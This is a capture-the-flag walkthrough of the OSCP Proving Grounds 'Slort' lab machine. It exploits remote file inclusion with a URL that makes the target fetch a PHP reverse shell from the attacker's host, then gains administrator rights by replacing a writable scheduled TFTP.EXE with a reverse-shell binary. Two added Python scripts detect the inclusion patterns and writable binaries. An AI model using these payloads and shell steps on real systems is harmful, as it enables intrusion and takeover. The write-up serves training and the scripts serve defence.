OSCP - Proving Grounds - Slort
Key takeaways
- File inclusion
- Windows reverse shell
Walkthrough
Run nmap. As usual, many ports are open; attempts against FTP, SMB and the like all failed.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 12:00 UTC
Nmap scan report for 192.168.53.53
Host is up (0.00095s latency).
Not shown: 65520 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3306/tcp open mysql?
| fingerprint-strings:
| HTTPOptions, LDAPBindReq, NULL, SSLSessionReq:
|_ Host '192.168.49.53' is not allowed to connect to this MariaDB server
4443/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.53.53:4443/dashboard/
5040/tcp open unknown
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.53.53:8080/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
However, ports 4443 and 8080 both serve a web application. Running dirsearch against them gives very similar results: both expose a /site path.
# Dirsearch started Sun Oct 13 08:24:31 2024 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://192.168.170.53:4443 -w /usr/share/wordlists/dirb/big.txt......
......
301 346B http://192.168.170.53:4443/site -> REDIRECTS TO: http://192.168.170.53:4443/site/
......
......
The URL carries a parameter of the form page=xxx, which hints at a file inclusion vulnerability.
Testing confirms that local files can be included, so the next step is remote file inclusion to run a reverse shell.
Prepare a PHP web shell. The PHP reverse shell that ships with Kali does not work well here; use the following instead: https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php?ref=benheater.com
After starting nc -nlvp 80 and python -m http.server, visit the following link. The reverse shell is created successfully, and at this point we can
http://192.168.170.53:4443/site/index.php?page=http://192.168.45.239:8000/rev_1.php
C:\home\kali\Documents\OFFSEC\WarmUp\Slort> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.170.53] 50464
SOCKET: Shell has connected! PID: 7476
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\site>id
'id' is not recognized as an internal or external command,
operable program or batch file.

C:\xampp\htdocs\site>whoami
slort\rupert
C:\xampp\htdocs\site>type C:\Users\rupert\Desktop\local.txt
e8010a2882e22b837b7d0d0d746b2f74
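From the defender's side, the request that gave the foothold above leaves a clear trace: a page= parameter whose value is a URL, a PHP stream wrapper, or a traversal sequence. The script below is an added example (my code, not part of the write-up or of the XAMPP site on the box) that scans Apache access-log lines for exactly that pattern and labels each hit. The log lines are constructed; the parameter names in INCLUDE_PARAMS are an assumption about what this kind of application typically passes to include(). resolve_page models the application-side fix: the request selects a key from a fixed table, so no path or URL ever reaches include(). Remote inclusion additionally requires allow_url_include to be enabled in php.ini, which is why it should stay Off.

```python
import re
from typing import Optional, List, Dict
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-log lines (not taken from the write-up). The
# ?page= values mirror the request shapes this box is vulnerable to.
SAMPLE_LOG = """\
192.168.45.10 - - [13/Oct/2024:08:30:01 +0000] "GET /site/index.php?page=about HTTP/1.1" 200 1842 "-" "Mozilla/5.0"
192.168.45.10 - - [13/Oct/2024:08:30:05 +0000] "GET /site/index.php?page=../../../../windows/win.ini HTTP/1.1" 200 403 "-" "curl/8.0"
192.168.45.10 - - [13/Oct/2024:08:30:09 +0000] "GET /site/index.php?page=http://192.168.45.239:8000/rev_1.php HTTP/1.1" 200 0 "-" "curl/8.0"
192.168.45.10 - - [13/Oct/2024:08:30:12 +0000] "GET /site/index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 2210 "-" "curl/8.0"
192.168.45.10 - - [13/Oct/2024:08:30:15 +0000] "GET /dashboard/ HTTP/1.1" 200 7200 "-" "Mozilla/5.0"
"""

# Common/combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Assumed parameter names that web apps commonly pass straight into include().
INCLUDE_PARAMS = {"page", "file", "include", "template", "view"}
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
WRAPPER_SCHEMES = ("php://", "data:", "expect://", "phar://", "zip://", "file://")


def classify_include(value: str) -> Optional[str]:
    """Label an include parameter value, or return None when it looks benign."""
    v = unquote(value).lower()          # second decode catches %2e%2e-style encoding
    if v.startswith(REMOTE_SCHEMES):
        return "RFI"                    # only works server-side with allow_url_include=On
    if v.startswith(WRAPPER_SCHEMES):
        return "LFI-wrapper"            # php://filter etc. read source or bypass filters
    if "../" in v or "..\\" in v:
        return "LFI-traversal"
    if re.match(r"^[a-z]:[\\/]", v) or v.startswith(("/", "\\")):
        return "LFI-absolute"           # C:\... or /etc/... handed to include()
    return None


def scan_access_log(text: str) -> List[Dict]:
    """Return one finding per suspicious include parameter seen in the log."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for name, values in parse_qs(query, keep_blank_values=True).items():
            if name.lower() not in INCLUDE_PARAMS:
                continue
            for value in values:
                kind = classify_include(value)
                if kind:
                    findings.append({
                        "ip": m["ip"], "time": m["ts"], "param": name,
                        "value": value, "kind": kind, "status": int(m["status"]),
                    })
    return findings


# Model of the application-side fix: the request selects a key from a fixed
# table, so neither a path nor a URL ever reaches include().
ALLOWED_PAGES = {"home": "home.php", "about": "about.php", "contact": "contact.php"}


def resolve_page(requested: str) -> str:
    return ALLOWED_PAGES.get(requested, ALLOWED_PAGES["home"])


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['kind']:<14} {f['param']}={f['value']} -> {f['status']}")
```

Running it on the sample prints three findings (traversal, RFI, php:// wrapper) and ignores the two benign requests. A 200 status on an RFI hit, as in the write-up, is the strongest signal: the remote file was fetched and executed rather than rejected.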
Upload winPEASx64.exe to the server the same way and run it. It reports that we can modify C:\Backup\TFTP.exe:
Searching executable files in non-default folders with write (equivalent) permissions (can be slow)
File Permissions "C:\Backup\TFTP.EXE": Users [AllAccess],Authenticated Users [WriteData/CreateFiles]
Looking at C:\Backup reveals that it is executed every 5 minutes.
C:\Backup>dir
 Volume in drive C has no label.
 Volume Serial Number is 6E11-8C59

 Directory of C:\Backup

10/13/2024 06:25 AM <DIR> .
10/13/2024 06:25 AM <DIR> ..
06/12/2020 07:45 AM 11,304 backup.txt
06/12/2020 07:45 AM 73 info.txt
06/23/2020 07:49 PM 73,802 TFTP.EXE
 4 File(s) 187,334 bytes
 2 Dir(s) 28,561,285,120 bytes free

C:\Backup>type info.txt
Run every 5 minutes:
C:\Backup\TFTP.EXE -i 192.168.234.57 get backup.txt
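The root cause here is a privileged job that runs a binary from a directory where Users and Authenticated Users hold write rights: whoever can write the file runs as the job's account every 5 minutes. The following is an added example (my own code, not from the write-up or from winPEAS) of the audit a defender can run offline: it parses winPEAS "File Permissions" lines, takes the command lines a privileged job executes, and flags any binary that a low-privilege principal can overwrite. The TFTP.EXE line and command are the ones shown above; the sync.exe entries are constructed as a safe control case, and the sets of low-privilege principals and write-equivalent right names are my assumptions about how winPEAS labels them.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of winPEAS "File Permissions" output. The TFTP.EXE line
# matches what the write-up shows; the sync.exe line is a made-up safe case.
WINPEAS_OUTPUT = r'''
File Permissions "C:\Backup\TFTP.EXE": Users [AllAccess],Authenticated Users [WriteData/CreateFiles]
File Permissions "C:\Program Files\Backup Tool\sync.exe": Administrators [AllAccess],Users [ReadAndExecute]
'''

# Commands a privileged job runs: the first is the one in C:\Backup\info.txt,
# the second is constructed.
SCHEDULED_COMMANDS = [
    r"C:\Backup\TFTP.EXE -i 192.168.234.57 get backup.txt",
    r'"C:\Program Files\Backup Tool\sync.exe" /quiet',
]

# Assumed: every interactive local account is a member of these groups, so
# write access granted to them means "any user can replace the binary".
LOW_PRIV_PRINCIPALS = {"users", "builtin\\users", "authenticated users",
                       "everyone", "interactive"}
# Assumed winPEAS right names that allow changing or replacing file contents.
WRITE_RIGHTS = {"allaccess", "fullcontrol", "modify", "write", "writedata",
                "writedata/createfiles", "createfiles", "delete"}

PERM_RE = re.compile(r'File Permissions "(?P<path>[^"]+)":\s*(?P<acl>.+)$')
ACE_RE = re.compile(r'(?P<who>[^\[\],]+?)\s*\[(?P<rights>[^\]]+)\]')


def parse_winpeas_permissions(text: str) -> Dict[str, List[Tuple[str, List[str]]]]:
    """Map lower-cased path -> [(principal, [rights...]), ...]."""
    perms = {}
    for line in text.splitlines():
        m = PERM_RE.search(line)
        if not m:
            continue
        aces = [(who.strip(), [r.strip() for r in rights.split(",")])
                for who, rights in ACE_RE.findall(m["acl"])]
        perms[m["path"].lower()] = aces
    return perms


def writable_by_low_priv(aces) -> List[str]:
    """Low-privilege principals that hold a write-equivalent right on the file."""
    return [who for who, rights in aces
            if who.lower() in LOW_PRIV_PRINCIPALS
            and any(r.lower() in WRITE_RIGHTS for r in rights)]


def binary_of(command: str) -> str:
    """First token of a command line, honouring a double-quoted path with spaces."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.index('"', 1)]
    return command.split()[0]


def audit_scheduled_binaries(commands: List[str], winpeas_text: str) -> List[Dict]:
    """Flag scheduled binaries that low-privilege principals can overwrite."""
    perms = parse_winpeas_permissions(winpeas_text)
    findings = []
    for cmd in commands:
        exe = binary_of(cmd)
        writers = writable_by_low_priv(perms.get(exe.lower(), []))
        findings.append({"command": cmd, "binary": exe, "writable_by": writers,
                         "risk": "HIGH" if writers else "ok"})
    return findings


if __name__ == "__main__":
    for f in audit_scheduled_binaries(SCHEDULED_COMMANDS, WINPEAS_OUTPUT):
        print(f"[{f['risk']}] {f['binary']}  writable by: "
              f"{', '.join(f['writable_by']) or '-'}")
```

For the sample this reports C:\Backup\TFTP.EXE as HIGH, writable by Users and Authenticated Users, and sync.exe as ok. The fix is to grant write on the binary and its directory only to Administrators and SYSTEM (for example with icacls) or to move the job's binary out of a user-writable location; for detection, alert on any modification of a file referenced by a privileged scheduled task.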
A search for Windows reverse shells turns up https://github.com/izenynn/c-reverse-shell. Compile reverse.exe following its instructions, upload it to the remote server the same way, and overwrite C:\Backup\TFTP.EXE with it.
C:\Backup>dir
 Volume in drive C has no label.
 Volume Serial Number is 6E11-8C59

 Directory of C:\Backup

10/13/2024 06:25 AM <DIR> .
10/13/2024 06:25 AM <DIR> ..
06/12/2020 07:45 AM 11,304 backup.txt
06/12/2020 07:45 AM 73 info.txt
06/23/2020 07:49 PM 73,802 TFTP.BACKUP.EXE
10/13/2024 06:24 AM 102,155 TFTP.EXE
 4 File(s) 187,334 bytes
 2 Dir(s) 28,561,285,120 bytes free
After starting nc -nlvp 443 locally and waiting a while, we get a shell with administrator privileges.
C:\home\kali\Documents\OFFSEC\WarmUp\Slort> nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.170.53] 50617
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>id
id
'id' is not recognized as an internal or external command,
operable program or batch file.

C:\WINDOWS\system32>whoami
whoami
slort\administrator

C:\WINDOWS\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 6E11-8C59

 Directory of C:\Users\Administrator\Desktop

05/04/2022 01:30 AM <DIR> .
05/04/2022 01:30 AM <DIR> ..
05/04/2022 01:21 AM <DIR> PG
10/13/2024 05:08 AM 34 proof.txt
 1 File(s) 34 bytes
 3 Dir(s) 28,561,133,568 bytes free

C:\Users\Administrator\Desktop>type proof.txt
type proof.txt
f94a028a4e3c54e15f32f1dae49907b6

C:\Users\Administrator\Desktop>cd